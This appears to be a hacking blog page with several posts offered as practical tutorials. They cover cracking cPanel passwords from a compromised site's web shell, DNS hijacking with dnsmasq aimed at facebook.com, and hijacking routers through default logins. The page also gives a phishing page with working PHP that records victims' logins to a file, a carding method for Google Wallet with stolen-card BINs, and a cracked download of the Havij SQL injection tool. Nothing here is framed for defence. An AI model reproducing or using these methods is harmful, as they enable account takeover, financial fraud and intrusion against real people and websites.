Recent Posts

Cpanel Cracking Method

22:12 5 Comments

Things Required :-
  • Shelled site
  • Cpanel Password Cracker (shell)

Step By Step Tutorial :-
  • First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here .
  • Then go down & click on User .


  • Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .
Tip: Password list should be short & effective .


  • When the cracking is finished, you will see the result . 

  • After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel
Read More:

DNS Hijacking Method

DNS Hijacking Method

22:11 2 Comments


This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.


To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.


Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a victim? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

 Read More:

 http://ansaritricks.blogspot.com

Create a Simple Phishing Page (Fake Login Page)

22:08 2 Comments

What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page. 


How to create? 
*. Visit the page that you want to clone. 
*. Save it (CTRL+S) via your browser. 
*. Choose save complete webpage while saving it via browser. 
*. Give name index.php while saving. 
*. Save it to a folder. 


Now, you should have one file named "index.php" and a folder. We have to edit index.php file. Edit it and search "action". You will get something like this if you are creating fake page of facebook, action="https:// www.facebook.com/ login.php?login_attempt=1" method="post" , We have to edit this line only. Change https://www.facebook.com/ login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it. 

How to create login.php? Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php. 
Code: 
<?php header("Location: http://www.facebook.com"); $handle = fopen("pass.txt","a"); foreach($_GET as $variable = $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
 You have to change http://www.facebook.com to the site url that you are cloning, for example, change it to http://www.gmail.com if you are cloning gmail. Now, you have your phishing page.

 For More:
http://ansaritricks.blogspot.com
How To Hack Google Wallet

How To Hack Google Wallet

11:46 37 Comments



Proof -





↓↓↓↓ Method ↓↓↓↓

1. Log in to gmail account
2. Turn on vpn & set ip us (my vpn zenmate)
3. Reload your browser if success log in to google account
4. Go to http://wallet.google.com
5. Go to wallet setting & verify your google account. Add ssn us etc
6. If verify success, now add public cc / private cc
7. Success add card, now try to add money wallet / send to other account google wallet.
8. Hope your transaction aproved, because google need verify transaction. 2~7 bussiness day.

Enjoy...!!!


TESTED BIN

Card : 516310xxxxxxxxxxx
BIN : 516310
CARD BRAND : MASTERCARD
Issuing Organization : WESTPAC BANKING CORPORATION
Card Type : CREDIT
Card SubType : WORLD
Issuing Country : AUSTRALIA
checked by : https://www.exactbins.com/bin-lookup
----------------------------------------------
Card : 405221xxxxxxxxxxx
BIN : 405221
CARD BRAND : VISA
Issuing Organization : COMMONWEALTH BANK OF AUSTRALIA
Card Type : CREDIT
Card SubType : PLATINUM
Issuing Country : AUSTRALIA
checked by : https://www.exactbins.com/bin-lookup

 For More:
http://ansaritricks.blogspot.com

Havij 1.17 Final Free Download With Patch - ComeForHack

11:44 10 Comments
Screen Shot:



                                                             Version: 1.17 (Pro)
                                                              File Size: 6.58 MB
                                                              File Type: .RAR

RAR Password: asimaliansari

Havij 1.17 Pro Cracked Download Link Is Here:



Subscribe to: Posts (Atom)